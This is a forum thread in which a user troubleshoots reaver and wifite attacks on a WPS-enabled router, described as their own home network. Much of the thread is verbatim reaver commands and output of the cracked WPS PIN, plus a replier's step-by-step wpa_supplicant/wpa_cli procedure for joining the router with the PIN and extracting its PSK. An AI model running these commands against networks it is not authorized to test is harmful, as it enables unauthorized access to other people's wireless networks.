Page 1 of 2 12 LastLast
Results 1 to 10 of 12

Thread: wifite.py + reaver to retrieve WPA2 pass phrase

  1. #1
    Senior Member
    Join Date
    Feb 2012
    Location
    Cyberspace
    Posts
    174

    Default wifite.py + reaver to retrieve WPA2 pass phrase

    I am running these tools against my home network.

    I am running first wifite.py (http://www.backtrack-linux.org/forum...ad.php?t=48161) and then reaver.
    I know wifite.py is very capable of cracking WPS enabled APs. However this time it cracked the correct WPS pin but not the passphrase. Hence I run reaver to crack the passphrase. I ran it 4 times and everytime it retrieved 4 different passphrase and none of them are correct. Please see the detailed output as below.

    Would be keen to know the reason for this please.

    Regards

    Code:
    root@bt:~# uname -a
    Linux bt 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST 2012 x86_64 GNU/Linux
    
    root@bt:~# reaver -i mon0 -b D0:7D:33:6E:A7:B7 -p 18794786 -c 11 -vv
    
    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    
    [+] Switching mon0 to channel 11
    [+] Waiting for beacon from D0:7D:33:6E:A7:B7
    [+] Associated with D0:7D:33:6E:A7:B7 (ESSID: Security)
    [+] Trying pin 18794786
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 18794786
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M7 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [+] Pin cracked in 11 seconds
    [+] WPS PIN: '18794786'
    [+] WPA PSK: 'aa0a90d4868af15113e51e818e437a6726f75efc7c38d1c9947f26377324f389'
    [+] AP SSID: 'Security'
    [+] Nothing done, nothing to save.
    root@bt:~# reaver -i mon0 -b D0:7D:33:6E:A7:B7 -p 18794786 -c 11 -vv
    
    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    
    [+] Switching mon0 to channel 11
    [+] Waiting for beacon from D0:7D:33:6E:A7:B7
    [+] Associated with D0:7D:33:6E:A7:B7 (ESSID: Security)
    [+] Trying pin 18794786
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [+] Trying pin 18794786
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [+] Trying pin 18794786
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 18794786
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [+] Trying pin 18794786
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M7 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [+] Pin cracked in 26 seconds
    [+] WPS PIN: '18794786'
    [+] WPA PSK: '3b3c94285738ab32c88274bebbc7fc9641c2ed123ada4e55dca897ca57ce8e05'
    [+] AP SSID: 'Security'
    You have new mail in /var/mail/root
    root@bt:~# reaver -i mon0 -b D0:7D:33:6E:A7:B7 -p 18794786 -c 11 -vv
    
    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    
    [+] Switching mon0 to channel 11
    [+] Waiting for beacon from D0:7D:33:6E:A7:B7
    [+] Associated with D0:7D:33:6E:A7:B7 (ESSID: Security)
    [+] Trying pin 18794786
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M1 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    [+] Trying pin 18794786
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [+] Trying pin 18794786
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M1 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    [+] Trying pin 18794786
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [+] Trying pin 18794786
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M7 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [+] Pin cracked in 30 seconds
    [+] WPS PIN: '18794786'
    [+] WPA PSK: '6437b12e41d82c03f53f23993b79a03b728dbc4dffae116ade802cb3a941e6ec'
    [+] AP SSID: 'Security'
    You have new mail in /var/mail/root
    root@bt:~# reaver -i mon0 -b D0:7D:33:6E:A7:B7 -p 18794786 -c 11 -vv
    
    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    
    [+] Switching mon0 to channel 11
    [+] Waiting for beacon from D0:7D:33:6E:A7:B7
    [+] Associated with D0:7D:33:6E:A7:B7 (ESSID: Security)
    [+] Trying pin 18794786
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M1 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    [+] Trying pin 18794786
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M7 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [+] Pin cracked in 13 seconds
    [+] WPS PIN: '18794786'
    [+] WPA PSK: '9402de2456f497009bd2725123dd97c05b9a947373187893eb41790024185283'
    [+] AP SSID: 'Security'
    [+] Nothing done, nothing to save.
    root@bt:~#

  2. #2
    Senior Member
    Join Date
    Feb 2012
    Location
    Cyberspace
    Posts
    174

    Default Re: wifite.py + reaver to retrieve WPA2 pass phrase

    I see the topic is moved. Hopefully someone will respond now.
    Thanks

  3. #3
    Senior Member
    Join Date
    Feb 2012
    Location
    Cyberspace
    Posts
    174

    Default Re: wifite.py + reaver to retrieve WPA2 pass phrase

    Hi ya all.. I am hoping at least someone can point me to some other resources where I can possibly find the answer my query..

    regards

  4. #4
    Member longjidin's Avatar
    Join Date
    Feb 2010
    Location
    Kg Lengkong to Bukit Lada
    Posts
    93

    Default Re: wifite.py + reaver to retrieve WPA2 pass phrase

    Ok i think better you follow this http://code.google.com/p/wifite/ and this https://github.com/derv82/wifite with this tutorial confirm you can understand how the wifite+reaver working together......


    Good Luck

  5. #5
    Senior Member
    Join Date
    Feb 2012
    Location
    Cyberspace
    Posts
    174

    Default Re: wifite.py + reaver to retrieve WPA2 pass phrase

    Quote Originally Posted by longjidin View Post
    Ok i think better you follow this http://code.google.com/p/wifite/ and this https://github.com/derv82/wifite with this tutorial confirm you can understand how the wifite+reaver working together......


    Good Luck

    Hey thanks.. I think I have moved on from wifite.py (great tool really). This now pertains only to Reaver tool. Question is for the same WPS Pin why does Reaver crack different passphrases (none of them work by the way).?

  6. #6
    Senior Member
    Join Date
    Feb 2012
    Location
    Cyberspace
    Posts
    174

    Default reaver retrieves WPA2 PIN but not the correct pass phrase

    ok reviving this old post of mine..
    I have now installed Reaver v1.3 and still trying to crack my AP..it's getting the correct pin but now the passphrase

    Code:
    root@bt:~# reaver -i mon0 -b F0:7D:68:6E:A7:E8 -e Security -c 11 -p 18794786
    
    Reaver v1.3 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    
    [+] Waiting for beacon from F0:7D:68:6E:A7:E8
    [+] Associated with F0:7D:68:6E:A7:E8 (ESSID: Security)
    [+] WPS PIN: '18794786'
    [+] WPA PSK: '238ae6076460e99efbf7a5e3940db4fbe7f35cf61a7972444f04bfd3847941e7'
    [+] AP SSID: 'Security'
    
    root@bt:~# reaver -i mon0 -b F0:7D:68:6E:A7:E8 -e Security -c 11 -p 18794786
    
    Reaver v1.3 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    
    [+] Waiting for beacon from F0:7D:68:6E:A7:E8
    [+] Associated with F0:7D:68:6E:A7:E8 (ESSID: Security)
    [+] WPS PIN: '18794786'
    [+] WPA PSK: '395038100f4cf0940101bd7ec69adab509af5f189af1931db576d9198160819c'
    [+] AP SSID: 'Security'
    Quite curious here..

    Have looked over here:
    http://code.google.com/p/reaver-wps/issues/list

    But nothing really pointing me to the right direction. I just had a feeling that Reaver v1.3 is a bit better than Reaver v1.4 however I am still getting the same error.

    Any pointer..It's really a reaver issue and not wifite.py issue.

  7. #7
    Senior Member VulpiArgenti's Avatar
    Join Date
    Sep 2011
    Location
    lost
    Posts
    174

    Default Re: wifite.py + reaver to retrieve WPA2 pass phrase

    If the PIN is correct, you can use wpa_supplicant and wpa_cli to authenticate to the router, and then read the PSK either from the router config page or wpa_supplicant.conf. There is info on how to do this in the Reaver googlecode issues section. Reaver often gives me the PIN but not the PSK, and I can confirm this method works.

  8. #8
    Senior Member
    Join Date
    Feb 2012
    Location
    Cyberspace
    Posts
    174

    Default Re: wifite.py + reaver to retrieve WPA2 pass phrase

    Quote Originally Posted by VulpiArgenti View Post
    If the PIN is correct, you can use wpa_supplicant and wpa_cli to authenticate to the router, and then read the PSK either from the router config page or wpa_supplicant.conf. There is info on how to do this in the Reaver googlecode issues section. Reaver often gives me the PIN but not the PSK, and I can confirm this method works.
    First of all thanks a lot to VulpiArgenti. Let me first warn the readers that this going to be a long message.

    I am still not able to successfully retrieve the passphrase though I know this method works as I have tested it with other routers.

    Explaining method: All credit goes to this poster:

    http://code.google.com/p/reaver-wps/.../detail?id=203

    ________

    First, set yourself up a very basic wpa_supplicant.conf in /etc/wpa_supplicant.conf:
    --
    ctrl_interface=/var/run/wpa_supplicant
    ctrl_interface_group=0
    update_config=1
    --

    Second, start wpa_supplicant in daemon mode:
    wpa_supplicant -Dwext -iwlan0 -c/etc/wpa_supplicant.conf –B

    Third, run wpa_cli, and verify that it's working by issuing command 'status'.
    You should see wpa_state=INACTIVE

    Fourth, lets add our BSSID and PIN:
    wpa_reg <bssid> <wps pin>
    wps_reg aa:bb:cc:dd:ee:ff 18794786

    You should see an "OK". Wait a few more seconds as wpa_supplicant picks up the BSSID
    and tries to associate and perform key negotiation. What you want to see is
    "CTRL-EVENT-CONNECTED", which will indicate that the PIN was accepted and that you're
    now associated.

    At this point, if you were to exit wpa_cli, you could run dhclient on wlan0
    and would be offered an IP from the AP, assuming DHCPd were enabled.

    Go ahead and type the command 'save' at wpa_cli terminal, which should output another "OK".
    This will update the wpa_supplicant.conf file, as specified from the command line,
    with a static configuration for this new network.

    Verify by: cat /etc/wpa_supplicant.conf

    If all went well, you should have a line under this new network titled 'psk'.
    That is the ssid passphrase
    ___________

    Now here is my output of the events:

    I have created the wpa_supplicant.conf and then start the wpa_supplicant in daemon mode in one terminal

    Then I open another terminal and start wpa_cli
    Please see the output of these two terminals:

    Code:
    root@bt:/etc# wpa_cli
    wpa_cli v0.6.9
    Copyright (c) 2004-2009, Jouni Malinen <j@w1.fi> and contributors
    
    This program is free software. You can distribute it and/or modify it
    under the terms of the GNU General Public License version 2.
    
    Alternatively, this software may be distributed under the terms of the
    BSD license. See README and COPYING for more details.
    
    
    Selected interface 'wlan0'
    
    Interactive mode
    
    > status
    wpa_state=INACTIVE
    
    > wps_reg aa:bb:cc:dd:ee:ff 18794786
    OK
    > <2>CTRL-EVENT-SCAN-RESULTS 
    <2>WPS-AP-AVAILABLE 
    <2>Trying to associate with aa:bb:cc:dd:ee:ff (SSID='Security' freq=2462 MHz)
    <2>CTRL-EVENT-SCAN-RESULTS 
    <2>WPS-AP-AVAILABLE 
    <2>Associated with aa:bb:cc:dd:ee:ff
    <2>CTRL-EVENT-EAP-STARTED EAP authentication started
    <2>CTRL-EVENT-EAP-METHOD EAP vendor 14122 method 1 (WSC) selected
    <2>CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
    <2>CTRL-EVENT-SCAN-RESULTS 
    <2>WPS-AP-AVAILABLE-PIN 
    
    root@bt:/etc#
    and corresponding wpa_supplicant deamon output:

    Code:
    root@bt:/etc# wpa_supplicant -Dwext -iwlan0 -c/etc/wpa_supplicant.conf –B
    WPS-AP-AVAILABLE 
    WPS-AP-AVAILABLE 
    WPS-AP-AVAILABLE 
    Trying to associate with aa:bb:cc:dd:ee:ff (SSID='Security' freq=2462 MHz)
    WPS-AP-AVAILABLE 
    Associated with aa:bb:cc:dd:ee:ff
    WPA: No wpa_ie set - cannot generate msg 2/4
    CTRL-EVENT-EAP-STARTED EAP authentication started
    CTRL-EVENT-EAP-METHOD EAP vendor 14122 method 1 (WSC) selected
    WPA: No wpa_ie set - cannot generate msg 2/4
    WPA: No wpa_ie set - cannot generate msg 2/4
    WPA: No wpa_ie set - cannot generate msg 2/4
    WPA: No wpa_ie set - cannot generate msg 2/4
    WPA: No wpa_ie set - cannot generate msg 2/4
    WPA: No wpa_ie set - cannot generate msg 2/4
    So somehow it's not working for me..

    One time it did work and I saved the wpa_supplicant.conf file but the passphrase was garbage again.

    Code:
    root@bt:/etc# cat wpa_supplicant.conf
    ctrl_interface=/var/run/wpa_supplicant
    ctrl_interface_group=0
    update_config=1
    
    network={
    	ssid="Security"
    	bssid=aa:bb:cc:dd:ee:ff
    	psk=692c966e5ff1eff5e16c698036d87d5bbe94cdb73d7f14b64eac6331be561019
    	proto=RSN
    	key_mgmt=WPA-PSK
    	pairwise=CCMP
    	auth_alg=OPEN
    Driving me nuts at the moment.

  9. #9
    Senior Member VulpiArgenti's Avatar
    Join Date
    Sep 2011
    Location
    lost
    Posts
    174

    Default Re: wifite.py + reaver to retrieve WPA2 pass phrase

    CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
    This suggests the PIN is wrong, or the AP is locked, or wpa_cli is not configured correctly (for your router).

    You could look at further commands to wpa_cli eg increase debugging level, force reassociation (see man), and also run wpa_supplicant with debug flag (-dd). Could also attempt to reconfigure the router with wpa_supplicant?? That's the limit of my knowledge I'm afraid.

  10. #10
    Just burned his ISO
    Join Date
    Jul 2012
    Posts
    3

    Default Re: wifite.py + reaver to retrieve WPA2 pass phrase

    Just to clarify, there seems to be some confusion between the passphrase and the pre-shared key (PSK) here.

    The passphrase is what you configure on your router/AP. Similar to a password, and (relatively) easy to remember. Your router/AP does not use this for encryption. The actual key (PSK) is calculated through applying a key-derivation function which is salted with the router's SSID

    VulpiArgenti's post above sounds about right. I was messing about with my own network settings yesterday - configuring network settings without using either network manager or WICD. I ran into the same issue with the disconnect event a number of times. Seems that there's a few different ways of configuring the wpa_supplicant.conf file, and that the network can be a bit fussy about that.

Page 1 of 2 12 LastLast

Similar Threads

  1. wifite v2 beta
    By derv82 in forum BackTrack 5 Experts Section
    Replies: 39
    Last Post: 02-09-2013, 03:37 PM
  2. Cannot retrieve minimized applications
    By spideyz in forum BackTrack 5 Beginners Section
    Replies: 2
    Last Post: 12-02-2011, 10:05 AM
  3. Is it possible to retrieve a specific page from Akamai's cache?
    By thorin in forum BackTrack 5 Experts Section
    Replies: 4
    Last Post: 09-15-2011, 03:02 PM
  4. Wifite installed from repos
    By skinnypuppy in forum BackTrack Fixes
    Replies: 2
    Last Post: 10-19-2010, 07:59 PM
  5. WPA2 pass
    By tomgr in forum OLD Newbie Area
    Replies: 8
    Last Post: 03-27-2009, 07:06 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •